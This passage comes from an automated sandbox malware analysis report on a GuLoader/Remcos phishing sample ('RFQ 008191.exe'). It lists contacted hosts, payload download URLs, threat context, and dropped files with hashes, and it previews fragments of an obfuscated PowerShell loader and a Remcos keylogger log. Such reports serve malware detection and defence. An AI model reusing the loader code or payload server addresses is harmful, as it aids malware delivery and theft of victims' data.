                                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comJuryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.comJuryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://212.162.149.89/wwVHOGRH148.binsJuryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.1762545128.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/accounts/serviceloginJuryen.exefalse
                                                          		high
                                                          https://login.yahoo.com/config/loginJuryen.exefalse
                                                            		high
                                                            http://www.nirsoft.net/Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1762545128.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.ebuddy.comJuryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                212.162.149.91
                                                                		unknownNetherlands
                                                                		64236UNREAL-SERVERSUStrue
                                                                212.162.149.89
                                                                		unknownNetherlands
                                                                		64236UNREAL-SERVERSUSfalse
                                                                178.237.33.50
                                                                		geoplugin.netNetherlands
                                                                		8455ATOM86-ASATOM86NLfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1572498
                                                                Start date and time:2024-12-10 16:27:09 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 57s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:19
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:RFQ 008191.exe
                                                                Detection:MAL
                                                                Classification:mal100.phis.troj.spyw.evad.winEXE@12/17@1/3
                                                                EGA Information:
                                                                • Successful, ratio: 83.3%
                                                                HCA Information:
                                                                • Successful, ratio: 97%
                                                                • Number of executed functions: 185
                                                                • Number of non-executed functions: 257
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 1264 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: RFQ 008191.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                10:28:06API Interceptor32x Sleep call for process: powershell.exe modified
                                                                11:45:45API Interceptor80397x Sleep call for process: Juryen.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                212.162.149.91order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  212.162.149.89order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 212.162.149.89/xONeIbG151.bin
                                                                  PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 212.162.149.89/KSMZNlmay152.bin
                                                                  178.237.33.50PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • geoplugin.net/json.gp
                                                                  matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  • geoplugin.net/json.gp
                                                                  WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                                                  • geoplugin.net/json.gp
                                                                  PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • geoplugin.net/json.gp

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  geoplugin.netPO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  • 178.237.33.50
                                                                  WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 178.237.33.50

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  UNREAL-SERVERSUSpurchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 212.162.149.66
                                                                  Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 212.162.149.66
                                                                  order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 212.162.149.89
                                                                  PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 212.162.149.89
                                                                  la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.251.123.175
                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                  • 212.162.149.48
                                                                  https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                                                  • 172.96.10.214
                                                                  scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 162.251.122.87
                                                                  1g4lfpPUqt.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 212.162.149.63
                                                                  purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 212.162.149.66
                                                                  ATOM86-ASATOM86NLPO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  • 178.237.33.50
                                                                  WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 178.237.33.50
                                                                  UNREAL-SERVERSUSpurchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 212.162.149.66
                                                                  Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 212.162.149.66
                                                                  order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 212.162.149.89
                                                                  PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 212.162.149.89
                                                                  la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.251.123.175
                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                  • 212.162.149.48
                                                                  https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                                                  • 172.96.10.214
                                                                  scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 162.251.122.87
                                                                  1g4lfpPUqt.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 212.162.149.63
                                                                  purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 212.162.149.66

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\ProgramData\remcos\logs.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):144
                                                                  Entropy (8bit):3.3544524354439966
                                                                  Encrypted:false
                                                                  SSDEEP:3:rhlKlyKOlfUlUlEKWNqlDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lZ6UlUU4b5YcIeeDAlOWAv
                                                                  MD5:179D67D7467E6C4138342551A4FA9EDA
                                                                  SHA1:91802D56D509C2DD6BD1246CD22FEC6231F93A7E
                                                                  SHA-256:95D80AE3C2A7DBF0547AD7FAB7BC400639C5D7BF6DBEBCCF404AA6A64AD06428
                                                                  SHA-512:8828B4F028481DCB52C712C1A798F0E7953F40E6BD8522147F9E5559A6A0BDBC4023E6BD13F49FC5CB36AA4D0ED94A9A0BC4DF4C8551613C843C07605A91BFA0
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                  Reputation:low
                                                                  Preview:....[.2.0.2.4./.1.2./.1.0. .1.1.:.4.5.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):963
                                                                  Entropy (8bit):5.014252336516381
                                                                  Encrypted:false
                                                                  SSDEEP:12:tkluand66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7S:qluWdbauKyGX85jvXhNlT3/7CcVKWro
                                                                  MD5:41AED8C7FD9535846FF1B201970579A9
                                                                  SHA1:670A7F736F7571C2584484D52552D408CD890A56
                                                                  SHA-256:F4379452004FC2CFE9D69CE016752E7A84725BD2FBF7AE0E74B6006FABE9F6E8
                                                                  SHA-512:C71EFACE69AE6B28D6A1A7BCBCDB7A6C914C24D43197F5F989B20A2BE4670C6BB8381A4EB3847EBA2DF5C3F8BE5229ADE4FB787811DA493ECDCCD82934F144B9
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):53158
                                                                  Entropy (8bit):5.062687652912555
                                                                  Encrypted:false
                                                                  SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                  MD5:5D430F1344CE89737902AEC47C61C930
                                                                  SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                  SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                  SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                  C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (4247), with CRLF, LF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):74877
                                                                  Entropy (8bit):5.186902050952871
                                                                  Encrypted:false
                                                                  SSDEEP:1536:YiZ5FgjrNcgoGx0Cq+PvEjBJajOMoNEhlUsKpYXG0qCr:XLFXhGNq/j3rPaoYG0p
                                                                  MD5:DFB785AB6C7A90CD2A2F0FEDE39565D3
                                                                  SHA1:D48DCC0968EB6A323231B67ABF5C19BB7879384A
                                                                  SHA-256:8D76FECA48E11BDD7F2667042C44AC26C5BEEAA37471775945E373FAC37D0475
                                                                  SHA-512:D998DAC5B7D83201DC4742673ECD46F8A2125C4A3360BE620D154A0D0A2278F8C8D0B3554D3119C38C446D8E2EB5A09158F06329E46BB7FD90D992A3DF9A2806
                                                                  Malicious:false
                                                                  Preview:$Surginess=$Kjeldahlize79;........$Postsplenial = @'.Musikan.H lvgud$Sh.malgJrouncyfoInvin.irInsemindMorp inb,ernesaa UgennesUcayaleeLorinerrBehandleNocuousdDionisieJeddock= G stro$D llsniMDitetikiHygrogrdPlantaiwRhizopoe Flakkos Fili itTrangsv;Prmieob.PlaintifMenstruuInbeaminForfattcSen.tsbt aboteuiProsel,oUdstempnbaga,eh ConoidsaindiffekForktritAndelshiMisapprv in erceVelfundr Tilstdi kappefnSpoilbagFumariusBemoanet Snipeda ActinoslsestoftK emand Firmaad(Cornopo$ JoomenTKonversiB svrenl Se umilRegistraF isegudLinjetle rieflelfluorini .mmelsg B,jobgeepaulets Hand l, Taeppe$dodeca,SAntabusthesternrBurdenli St.kirp MasseopStik roeTjavssttL,ptapd)Or.itho opydel{Jellyfi.unprinc.Convene$ NyctanDBuxomn o Resu dkUdrkeneuhvisk.dmS arrieeKosmonanFlaunchtSiliciusFyldestiRyperspd KoscheeMaterienGineppa Ve,ezue(WelchersDvrgpiluT,temerf geratofEntomoslUdfrelssAfdr maestresslrdoubtednSkal,nieHjemmeh Stif.m'O ercivDHypernaaBat sens.euterohFairwayiHung,rtsBevy,rapforudse$KabbeljRFremvi,uE.rovissFo

                                                                  C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean\tallness.ber

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):493903
                                                                  Entropy (8bit):1.2514017425028907
                                                                  Encrypted:false
                                                                  SSDEEP:1536:J5fAgVg2t2pObnNoCYrlANC4fcmCuJyzbffMxL+hJfryobV3Krqx1TJG:r/Bb+CYr2cbPiihhqUO
                                                                  MD5:8B4C2BBEDD252D6BB6DB679AB3723802
                                                                  SHA1:2D9775744675D3B32F3CA2FDF975C9293B719926
                                                                  SHA-256:9CCADD82A127BA29D7BA291CB307753D060CA26A3C3CCBCB9EDB3F3A38E5EE31
                                                                  SHA-512:7940E4CE5AB08DDFE4DB8B2676F9B92C51DC794C8772760C279B8BC57B7C97502ADBF91747D4FA57BAA6B5B695504E090875DF6890D478B8FD6CF8D70B3C8F65
                                                                  Malicious:false
                                                                  Preview:..Zy..........................................V......................k...................g........./.............Q.........l..#.....^............................................x..........&.............................../................................................................./............/.........................).......?......................p.............o..........................................sy............................................................5.........................R2...................................................................................................."e..............................................Y..................................................l.......{................s...............................................9..........................d.........&.......r......................<..........................................................................................................?............*..................L.................

                                                                  C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean\vaklende.sna

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):340924
                                                                  Entropy (8bit):1.2553271369192232
                                                                  Encrypted:false
                                                                  SSDEEP:768:rmUSNMYYmaSwBaGhKmULRAGcnjPDQ5lHJ30U5MFvsAkhuD7odAmLVBeOdlfHV22E:vvCsDuqEZ11vtew5dzv9
                                                                  MD5:C41E860BAAE2CC8168C2ABD50BB5BDF4
                                                                  SHA1:548575B164EDA9485A2B3F66161C8024619B6423
                                                                  SHA-256:601CF3825DCDD9076ED0A3CB778F62AF942CF20D64D3F86335A57B43E29F2B52
                                                                  SHA-512:9D2D97A7CAE52202807093ABF8BF4DE3F01BF54BAFF02C8110D800A7E6B1F6290B3ED60FB954809F9231BEDF730CA7244E9E51EE6B6074445DB180EB0E956718
                                                                  Malicious:false
                                                                  Preview:......................j..h....!..............................................p.............c....P............................k......................................y...............o`....................}...'9...........................Gt......................P.............................................................'.................................#.......................!.............................................................................................W.....C..........................................................................U...g......................................H.....s............n........U........)..........................................s.........S.................t......................................M.................................................................................S.............................................................H........................).............c.$...... .....................n.....................................

                                                                  C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Puddingy.Usu

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):329414
                                                                  Entropy (8bit):7.60419396464743
                                                                  Encrypted:false
                                                                  SSDEEP:6144:Ook9OUL0/vWBuiWACusaIJuUHQ1YEByb6rIAVFuH6XrXY:I0XWBuhA9Z4Q1YEUbaI+yajY
                                                                  MD5:06A40C4700069BCCB064BAB052AFEF0E
                                                                  SHA1:7A3DF76B80E59EE1BA6F7E7B7A58FC3BE5FF078C
                                                                  SHA-256:27C6CF4CD16539ADDF77DAB5CCF4274BA6B31783D873FB2D12B5CD62EECB7803
                                                                  SHA-512:DF57EAB67A428FCD9D17421AD5BD721522D30E241923C00239DF695784D43194C930341B996F28BDC6C5165EDB2E383A75A4224845311E32B8A9085E063FDCE6
                                                                  Malicious:false
                                                                  Preview:.......X....PPP.................a.oo.........4...6.......................gggg.n..........!!.........WW.///......|.....................8..mm...............//....DDD.............Q....#.....UU.........................:.@@......AA..........v............mm..==.......,..................0..EE....%%%%....................----.............??..y.$....................KKKKKKKKKK.V...6.ZZZ........LLLL...............!........AA..........#..M..z.|...X....B...Y....v.vv..............^^^.....%.....]]]].....s..???...333.QQ.........).........x.<...............p.............AAA...........................W....F..........m....V...****..........B.............___....................xx.........M..~..............HHH.............k............[[[..C..............33333....._....HH.....................................................................++.......ii...&&&.....................7...................|...........4.```.........eeee.........DD.........9.......................................@.....RRR.1........."""

                                                                  C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\acology.mar

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):437071
                                                                  Entropy (8bit):1.253825384833456
                                                                  Encrypted:false
                                                                  SSDEEP:768:uWsvcxI4BCLNVp0kyRWlxp4pkE5sS+ZA4o7VengmxKgoMqbGam2C1afEUe/u41Az:2T4BC0SG4J+VB8GA2pzEszrq2GrwLnj
                                                                  MD5:F030199A57CDBFC5D06AC8BFB59059C3
                                                                  SHA1:3C7AA5EA48CBAA34C8426B76498CD4BF5BF644BF
                                                                  SHA-256:FD1253B138D560D3AD0A56C32F37D0FDBDE9E16CC37E59E991595C7349B1F087
                                                                  SHA-512:7EC5E2553A15923396B77E07685172CEEAFDE8F60CCBB97E0796DCB8E1BBA8FF17F1CA242B143AD497942FDC8D7473AEFB5091E6492616B3D8C0EBCBA13C98C2
                                                                  Malicious:false
                                                                  Preview:.....................................X....................................>..a......................A......w..............................@.y........K..............................................z...................z...........p............V.....................................................h....................|..U.........../................................................................O..+.............................................+................F....................................2......................J..........................".........................A.............................-..............G..............S...............V.............t.......=.....................b.............................................................................................................................................................w................3........f.................2.........................m.0.........................................q...............................

                                                                  C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\straffesager.tra

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):484281
                                                                  Entropy (8bit):1.2585657408825282
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZtZbLcPMi2av+CVKljwe/ieUZ39FbMXVvL:PyPrdCBlotFbO
                                                                  MD5:A8740E0A6C72618AB3FB8804F4835BEF
                                                                  SHA1:6393CB3D9E3E670BA5C96F4A757F5B198196EB15
                                                                  SHA-256:EF5DB6A0097473B03CCF2A1E6152E2AC7AC57BB31B31A06529BCD3900E9C097C
                                                                  SHA-512:55740B7FE5A3D26FC47F9695B2FD33C045E67E6E36F0D2121235C2AEA9800F19740C1B0F797E32E8108E10245D8A4616308173E24A61129D82B9D60500C8763C
                                                                  Malicious:false
                                                                  Preview:.............................................................................[....2...........W......A.................S........y.................................................................4.......D...=...............Y......................".............................................................7............................................................................Y.....................................{........{.....>................m.....................................`...................................r...............................?.....#...............8.?.....................................................-..........\....................................................%:.................................p.................{.......r.............u..m...b...........................<.........................................................................1...............................................S.............................................4.............W....

                                                                  C:\Users\user\AppData\Local\Temp\Juryen.exe

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Category:dropped
                                                                  Size (bytes):795710
                                                                  Entropy (8bit):7.828737109365321
                                                                  Encrypted:false
                                                                  SSDEEP:12288:UXqlVfD6qKMwy8kjKsge8jLAMsnI8c78pc+HeV4PRklT3we+doWVkeehown:UXqzrTK5XsgervnIac+Hm4QT31V1hown
                                                                  MD5:82BA32E4800897E8BAFB32990D29F60A
                                                                  SHA1:21B724DF29B7DDBCD88849E7AD6AB12A4D266C4C
                                                                  SHA-256:777441225B9D294BACA2F689286A1F70A0FC28007E86CF1CC099C71EE1D826F2
                                                                  SHA-512:7E741FAB4E31223A967C4194F31E4FD592B75DC14DDE4C72C3FBD5EFB28F312807F886290FA8A227037890375D3ADA7597857138F4DF4D905B0AE4CA7B906101
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 18%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..........................................................................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...0...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\Juryen.exe:Zone.Identifier

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34f3p4gg.1oo.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
